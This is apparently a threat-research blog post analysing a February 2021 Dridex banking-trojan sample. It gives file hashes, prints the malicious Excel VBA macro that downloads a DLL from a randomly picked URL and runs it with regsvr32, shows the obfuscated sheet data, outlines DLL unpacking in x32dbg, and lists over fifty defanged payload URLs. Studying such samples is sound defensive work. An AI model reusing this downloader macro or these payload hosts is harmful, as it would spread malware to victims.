Dridex “also know as Bugat and Cridex” is a form of malware banking trojan and infostealer that operated by criminal group referred to as “Indrik Spider”. Dridex specializes in stealing banking credentials via systems that utilizes macros from Microsoft office products like Word and Excel. In previous recoded incident the threat actors have used Dridex to hit high value targets with ransomware [2].
This post is a report of the extracted code and URLs with other findings from the latest Dridex sample that been detected on 10 Feb 2021. This sample had been reported by a security researcher Moto_Sato. Threat actor have used similar techniques and procedure that has been discussed in the previous posts:
This post is a skim analysis and overview of the latest sample. for further steps and methods you can read the above post.
File Name | SHA265 | File Size | Detected AVs |
---|---|---|---|
INV-6291941768.xlsm | 176eaf6e286fc4dae986a46d712f92ab08ca051ab4cbd70db9e15cc4ebfc7815 |
79.77 KB |
12/65 |
ujewngbg.dll | 1468c3d62d7cde7ef475bebf87a3e696b456a1973f91f596d6f508b0c0f3cd38 | 989.00 KB | 7/67 |
fixed.bin | 2cceb29cebee08b9cf8cc02c370dec6440633f4b2da1f44db68998be84f1cb42 | 1.05 MB | 32/70 |
Threat Overview of Dridex
Based on the latest sample analysis and reports, the threat actor is using macro VBA loader in clear text functions in order to bypass detection by AV [3]
malware analysis
- Excel File
The XLSM file has four hidden sheets with white colored characters; and macro VBA locked in EvilClippy.
Macro VBA functions
#If VBA7 And Win64 Then
Private Declare PtrSafe Function next_for_and Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function next_for_and Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Function marball_a(ook As String, jo As Integer)
marball_a = Mid(ook, jo, onn)
End Function
Function bussy_order(asd As Variant) As String
Randomize: ii = 2 - onn: bussy_order = asd(Int((UBound(asd) + ii) * Rnd))
End Function
Sub fill_lines_u()
parcking_list = Split(RTrim(level_recharge), refreshPage(")"))
Sheets(onn).Cells(3, onn).Name = "ms_" & "excel"
mounthYYa = Split(parcking_list(1), refreshPage("+"))
For re = 0 To UBound(mounthYYa) - LBound(mounthYYa) + onn
On Error Resume Next
Sheets(onn).Cells(3, onn).value = "=" & mounthYYa(re)
fd = Len(po & ("" & (((((Run("" & "ms_" & "" & "excel"))))))))
If re = 12 Then refas = sheetsAGT:
If re = 14 Then
add2020 = sheetsAGT
next_for_and 0, Fuel_add(bussy_order(Split(parcking_list(0), refreshPage("H") & "h"))), refas & "\" & add2020, 0, 0
End If
Next
End Sub
Function sheetsAGT()
sheetsAGT = Sheets(onn).Range("C2:C8").SpecialCells(xlCellTypeConstants)
End Function
Public Function Fuel_add(y As String)
Fuel_add = Right(y, Len(y) - onn)
End Function
Function level_recharge()
Dim pockets_two As String
Dim chat_1_r As String: Dim swift_pay As String
Dim u As Integer: pockets_two = Nill_first(5)
chat_1_r = Nill_first(4): swift_pay = Nill_first(3)
For u = onn To Len(pockets_two)
empty_u = empty_u & marball_a(pockets_two, u) & marball_a(chat_1_r, u) & marball_a(swift_pay, u)
Next
level_recharge = RTrim(empty_u)
End Function
Function Nill_first(rt As Integer)
For Each Q In Sheets(rt).UsedRange.SpecialCells(xlCellTypeConstants): table_last = table_last & Q: Nill_first = table_last
Next
End Function
Function po()
po = "Z"
End Function
Function onn()
onn = 1
End Function
Function refreshPage(u As String)
refreshPage = Replace(String(4, po), po, u)
End Function
Character values hidden in sheets by order. It forms list of 50+ URLs to load a malicious DLL from one of them. The full list of URLs in APPENDIX -A
Sheet 1
ct:crruni…/h2.rHat:csai.liei.mbstHHhp/nvdaa9ckz.rHet:ts.mnggaHhts/dtoio1u.rHwt:bhynoltjaHhts/ee./jiaHhts/tneanito36aHhts/qt.uk5.pHht:dsnvsobdd.rHut:inl./q2aHhts/ooanrap1tHHhp/jaalnc/ewfaHhts/teorslodlvzHHhp/mot.m82xaHhts/ai.aadyez9diHhts/aeeomsoeir.mpm.pH1t:uui-e0whtpowa2tHHhp/an./6r.pHkt:w.w7.m9jriHhts/rcoesvec/2hrHHhp/eeiotnoom4.rHat:14omk6aHhts/tplci.m2xtHHhp/wi./mniHhts/nbtngvfiHhts/dtapkox.rH0t:miiln.m83xzHHhp/srpc/z8zHHhp/iyoq8aaHhts/mmscciouvtHHhp/aagnoocbx.pH3t:zutoeau/dltHHhp/ani.beac-klc/ivvaHhts/wtdgouwp.pHit:sknrrhuc/1mrHHhp/oig32zHHhp/oe.dc.mwptHHhp/c.pr8e8iHhts/eiitwsoq6.rH9t:39plkiwtpkowvvaHhts/etefiu3ziHhts/eac./o4aHhts/beuithrcc/8stHHhp/rndrc/uvtHHhp/wtrrtnlrteozbmtiHhts/voronlogj.pH2t:bwdsaea.liei.mmf9tHHhp/wagerbe10.rH5t:nardiog3.rHwt:ndrelisomwazHHhp/osprlta.mdh.rHrt:bn.se.nh9rHHhp/agitep8.rHyt:spt.lenptHHhp/lno.mupk.pHnt:n.srrc/yz2iHhts/abmhcogssputiHhts/icoobja)S.M"l,A1)+S.M"“J++TA(k,”+IIUESR(oG.RPE),CSFS)+ENEo,2++NLETE+S.M"“i)+AEK(U++TA(0”)+ENEodw"&&l"kc"k+S.M"g,hh""+S.M"“E(TOSC2,I(oi"EWKA()))“c"k”&l”“k++TAE2b+S.M”“E(ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67RD*5"l)+EVUCa++Lwb0SodwAmm"C&,v”&&"rh"v&,-"bb,++LCSFS
Sheet 1
ct:crruni…/h2.rHat:csai.liei.mbstHHhp/nvdaa9ckz.rHet:ts.mnggaHhts/dtoio1u.rHwt:bhynoltjaHhts/ee./jiaHhts/tneanito36aHhts/qt.uk5.pHht:dsnvsobdd.rHut:inl./q2aHhts/ooanrap1tHHhp/jaalnc/ewfaHhts/teorslodlvzHHhp/mot.m82xaHhts/ai.aadyez9diHhts/aeeomsoeir.mpm.pH1t:uui-e0whtpowa2tHHhp/an./6r.pHkt:w.w7.m9jriHhts/rcoesvec/2hrHHhp/eeiotnoom4.rHat:14omk6aHhts/tplci.m2xtHHhp/wi./mniHhts/nbtngvfiHhts/dtapkox.rH0t:miiln.m83xzHHhp/srpc/z8zHHhp/iyoq8aaHhts/mmscciouvtHHhp/aagnoocbx.pH3t:zutoeau/dltHHhp/ani.beac-klc/ivvaHhts/wtdgouwp.pHit:sknrrhuc/1mrHHhp/oig32zHHhp/oe.dc.mwptHHhp/c.pr8e8iHhts/eiitwsoq6.rH9t:39plkiwtpkowvvaHhts/etefiu3ziHhts/eac./o4aHhts/beuithrcc/8stHHhp/rndrc/uvtHHhp/wtrrtnlrteozbmtiHhts/voronlogj.pH2t:bwdsaea.liei.mmf9tHHhp/wagerbe10.rH5t:nardiog3.rHwt:ndrelisomwazHHhp/osprlta.mdh.rHrt:bn.se.nh9rHHhp/agitep8.rHyt:spt.lenptHHhp/lno.mupk.pHnt:n.srrc/yz2iHhts/abmhcogssputiHhts/icoobja)S.M"l,A1)+S.M"“J++TA(k,”+IIUESR(oG.RPE),CSFS)+ENEo,2++NLETE+S.M"“i)+AEK(U++TA(0”)+ENEodw"&&l"kc"k+S.M"g,hh""+S.M"“E(TOSC2,I(oi"EWKA()))“c"k”&l”“k++TAE2b+S.M”“E(ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67RD*5"l)+EVUCa++Lwb0SodwAmm"C&,v”&&"rh"v&,-"bb,++LCSFS
Sheet 2
hp/oi.rocczbx6rHHhp/outnsuosnc/craHhts/-ier-al3itHHhp/mpc/we.rHrt:mcagn/tttHHhp/egd.mdf.rHqt:uadeds.rHst:detnmu./gs.rHmt:muecbzuzHHhp/dime.mr4drHHhp/rfmijx.rHit:hrsr./x91aHhts/prhdgov1r.rHot:ltfwht.mfvoiHhts/amic/fw.rHut:lrnrlce.tvg.pHyt:arsaratsccoc/wxzHHhp/ninwk0eoa.m74gaHhts/u4cc5szHHhp/wpe6c/5q.pHpt:krtnpeisogf8aHhts/crnvi.m0kytHHhp/d.mtq.rHft:aoaohdc/6maHhts/wdnaf.pHet:fcohl28.pHvt:iurll1p7rHHhp/ovnucc/optiHhts/poeoqemiHhts/a.me0.rH4t:doaeeoni1haHhts/fnri.m8v3zHHhp/unst.mrb0saHhts/ldecitvabkiopg7.rHlt:dari.m3x3zHHhp/medoitrouc0aHhts/p./fdiHhts/nnceic/nmaHhts/te./9m.pHdt:anagad.mw3tHHhp/22rostiea.m4j.rH8t:tfulen5a.pH3t:cmbommn.rHqt:mi.atesveoak3aHhts/iapeogijaHhts/wheumttni…/q6.pH7t:dep.dc.milzHHhp/raiunmmsuosnc/bkraHhts/wlrnteyggtHHhp/ayvandagrHHhp/oxesuo./czoiHhts/rh.ciinc/ukrHHhp/uoctsf/keaHhts/rev./1wtHHhp/uoioi/xvaHhts/espc./syzHHhp/amsvsofvy.pHtt:cco.thli./wr.pH4t:pt.mn9.r)ENEclCR0)+ENEm,"+S.M"0")+FSMREC"“EWKA() LEAE++TA(0"”+CC.YR)+ENEh,l++NLETE+S.M"“O++TA(hf"hh"E&&u&)+ENEwb”"kl)+ENEb,FG.RPE3(N"an,TOSC2,-)La&0Tclm&0+S.L(,)+ENEa,FCRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)A(8).l++TAE2b+CLe&,"hf&“AACCm00ph”,"kgro"s&&,0+FELEAE
Sheet 3
ts/uebnteoausvaHhts/nlesocnlkoi8.rHdt:x-apru./yoaHhts/kroni1rHHhp/eal.fhzoaHhts/taec/crtHHhp/e.ucqfrHHhp/airtitiqhwtHHhp/yosl/q7iHhts/egoic./c6aHhts/aierprtHHhp/ogtaixct.rHpt:ahmoi.mi63rHHhp/illeoec/xu.pH8t:oracohvhtHHhp/enge-amn/gczHHhp/mrdmyerhhesodx9iHhts/stge.0bspc/5n.rHgt:beuh851iHhts/wor0ozm2zHHhp/oecctrc.myy.rHxt:thanaoc/vweaHhts/6c/jttHHhp/urusmtos0.rHot:w.jo2hzHHhp/ayo./p5zHHhp/nse./s7vaHhts/tefeeop9w.pH9t:rgu.mzc.pHjt:zpc/dytHHhp/e.xn…/13.rHst:lfsatc/s6viHhts/kflshbg54.rH7t:cerran-otaa.mzyprHHhp/inanc/30yiHhts/oagwco.mxf.rH0t:masrj.pH2t:cttonlomj.rH6t:chsbfcwzHHhp/gcdilyc/c4aHhts/7.ocmhnrrc/corHHhp/huri./iczHHhp/hl.mygbtHHhp/olqlycei.mxz.rH1t:ggru.m5k.rHzt:w.ecieaeavcnv50zHHhp/eleceic/ciiHhts/ornrciiocnlkof5c.rHtt:w.lea./5ryaHhts/vue./fxlaHhts/rtmotnrsya.pHbt:wkoaeoveoxp8aHhts/ywolsuom.rH6t:galesyr2aHhts/prtnnxp.rH5t:caceoas12iHhts/pgee.mlgxzHHhp/ohomenoeucjqzHHhp/htc/72r))TA(i"H(1++TA(A")+ENEh"++(NB(AHd,TOSC1),O(L)+S.M"“3)+AEK(U++TA(kcl+CC.YR)+ENEv,”+S.M"gw,“klxh"th++TA(e"S&&l++TA(bLTEWKA()FDRmgG.RPE311&olh&“i&ph)+EVUCb++TA(bLTH(N)67CRA(29&ARD*+)H(N)67CRA(29&ARD*+)H(N)67CRA(29,N)+&d”+S.L(,)+A(go”&gw",&&C"A,&“kn”&&s"0 ba0)+I.O(L)
Sheet 4
h25h3g70h8
After picking a random URL from the list, the final call is locate a the path to load from “%TEMP%” and the process “regsvr32.exe”. Even after closing the excel file the process keeps running.
2. DLL File
Threat actor seems to be using different tool or technique each time to pack the same DLL file that been seen in the previous analyzed samples [9][10] . However, the overall procedure to reverse engineer this part is the same. Self-Injection technique is the way this DLL performing.
Even though, there’s not detection of the method used to pack the malicious file in any of the tools like DetectItEasy (DiE), but it’s clear enough something is hidden.
Self-Injection is the method the threat actor been using so far and it’s simple for the analyst to extract the packed file. Using x32dbg and BreakPoint on <VirtualAlloc> and <VirtualProtect> is the way to go.
When loading the hidden stub, there seems to be a clear text of PowerShell use. This way is just to confuse the reverse engineering process. There seems no use of PowerShell at this point or when dynamically running the malicious file. The stub code is loaded at <009F0000> in this example!
After that, the “packed” or in better term the “overwritten” executable is been run in memory in the same original location when it first loaded in x32dbg and it’s possible to save the dump from memory. Since it’s from memory, it requires fixing the Raw Addresses using Pe-bear or CFF Explorer.
The fixed-dumped binary has been submitted to VT and anyRun. It’s seems to be the same exact DLL that been dumped in the previous analysis! with little overhead of misleading codes.
appendix -a
DO NOT run any of below URLs
hxxps://courier[.]burnnotice[.]co[.]za/buhxs26v[.]rar
hxxps://xn--viadeparra-u9a[.]cl/k3yzio[.]tar
hxxps://tmkspr[.]com/nnwige1g[.]rar
hxxps://medcatalog[.]info/h1tzuto[.]tar
hxxps://bethgayden[.]com/ldctfrj[.]tar
hxxps://ueea[.]edu[.]ec/dqjsfi[.]rar
hxxps://dateintrentaminuti[.]it/qogh3sw6[.]tar
hxxps://myquotes[.]club/kzq5u7[.]zip
hxxps://ddesignmoveis[.]com[.]br/d4cdd6[.]rar
hxxps://iranfilme[.]ir/jpqxr2[.]tar
hxxps://hoorgostaran[.]ir/xaxcp9t11[.]tar
hxxps://ajpharmaholding[.]com/vie16wr3f[.]rar
hxxps://littleflowerhostel[.]com/dfxlvuvo[.]zip
hxxps://omaromatic[.]com/h8fv2whx[.]tar
hxxps://learning[.]real-academy[.]net/zvg9gcd[.]zip
hxxps://amarresdeamorymaestroshechiceros[.]com/dpwxmx9[.]zip
hxxps://unsuiting-week[.]000webhostapp[.]com/w75a4n2g[.]tar
hxxps://bauen4u[.]ch/c8655rs1[.]zip
hxxps://www[.]power760[.]com/z95mjq2r[.]zip
hxxps://korrectconceptservices[.]com/gy2fyh8[.]rar
hxxps://techerainnovation[.]com/o0vmkw4ye[.]tar
hxxps://1d64[.]com/mtjkqt6[.]tar
hxxps://autorpauloschmidt[.]com/s260xm[.]tar
hxxps://www[.]idj[.]no/a2mfhn[.]zip
hxxps://fancybooth[.]nl/g2pv85f[.]zip
hxxps://industreal[.]pl/k1sop7x7v[.]rar
hxxps://motiveinfluence[.]com/p8o93pwxt[.]zip
hxxps://rspgroupe[.]com/qzzec8m[.]zip
hxxps://ziapy[.]com/qed80ya[.]tar
hxxps://demo[.]maxsence[.]co[.]in/oi1u13vh[.]tar
hxxps://laffansgranito[.]com/c8sbv6x3v[.]zip
hxxps://zukunftslotse[.]hamburg/b5d04ls[.]tar
hxxps://calendrier[.]cabinet-avocat-bakkali[.]com/pzigyv7pv[.]rar
hxxps://diwantrading[.]com/u33wx0p3y[.]zip
hxxps://smokeandgrowrichtour[.]com/ux1cfm0[.]rar
hxxps://mopai[.]sg/r3fj2d[.]zip
hxxps://content[.]codencil[.]com/mwnjpm[.]tar
hxxps://ccth[.]esp[.]br/f89cemw8[.]zip
hxxps://agenciadigitalwdys[.]com/qwc634[.]tar
hxxps://32792[.]prolocksmithwinterpark[.]com/w4cvjov[.]rar
hxxps://thefuturelife[.]in/u5i3acz[.]zip
hxxps://chemlab[.]com[.]my/mgonb4[.]tar
hxxps://mobile[.]qualitytechservice[.]com/ax8kzs3[.]tar
hxxps://grignardpure[.]com/g5uikvj[.]tar
hxxps://www[.]therecruitmentalternative[.]co[.]nz/vbq5m60t[.]zip
hxxps://developer[.]codencil[.]com/gicjli[.]zip
hxxps://browardinsurancemiami[.]solucioneslink[.]com/fmb5fkc9r[.]tar
hxxps://www[.]allgreenart[.]be/ey51gr0gy[.]tar
hxxps://navayurveda[.]in/odfgax3gl[.]rar
hxxps://nordxtremesolutions[.]ro/smcywzaao[.]zip
hxxps://workshop[.]arceliotivane[.]com/xduphk8[.]rar
hxxps://buynow[.]costless[.]fun/ohkm9e[.]rar
hxxps://garagelivet[.]se/yp1r8w2[.]tar
hxxps://supportit[.]online/xnxppv[.]tar
hxxps://cleanscope[.]com[.]au/sps1ky2[.]zip
hxxps://nap[.]mgsservers[.]com/flyvgzyx2[.]zip
hxxps://coachboom[.]mhtechnologies[.]us/cpwjurqt[.]zip
hxxps://phittc[.]com/on7b92j[.]rar
References
[1] Indrik Spider, https://malpedia.caad.fkie.fraunhofer.de/actor/indrik_spider
[2] Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware, https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/
[3] Dridex Malicious Document Analysis: Automating the Extraction of Payload URLs, https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/
[4] Excel file from AnyRun , https://app.any.run/tasks/3d132db7-78d1-40bb-8b9f-86d9049a1107/#
[5] Excel File in VT, https://www.virustotal.com/gui/file/176eaf6e286fc4dae986a46d712f92ab08ca051ab4cbd70db9e15cc4ebfc7815/details
[6] DLL file in VT, https://www.virustotal.com/gui/file/1468c3d62d7cde7ef475bebf87a3e696b456a1973f91f596d6f508b0c0f3cd38/detection
[7] Unpacked file submitted to VT, https://www.virustotal.com/gui/file/2cceb29cebee08b9cf8cc02c370dec6440633f4b2da1f44db68998be84f1cb42/details
[8] Unpacked file submitted to AnyRun, https://app.any.run/tasks/8f8f954d-6c3c-415d-a9ff-fd0a50209afd
[9] Dridex-malware-analysis [1 Feb 2021]
[10] Dridex-malware-analysis [8 Feb 2021]
Article Link: https://aaqeel01.wordpress.com/2021/02/10/dridex-malware-analysis-10-feb-2021/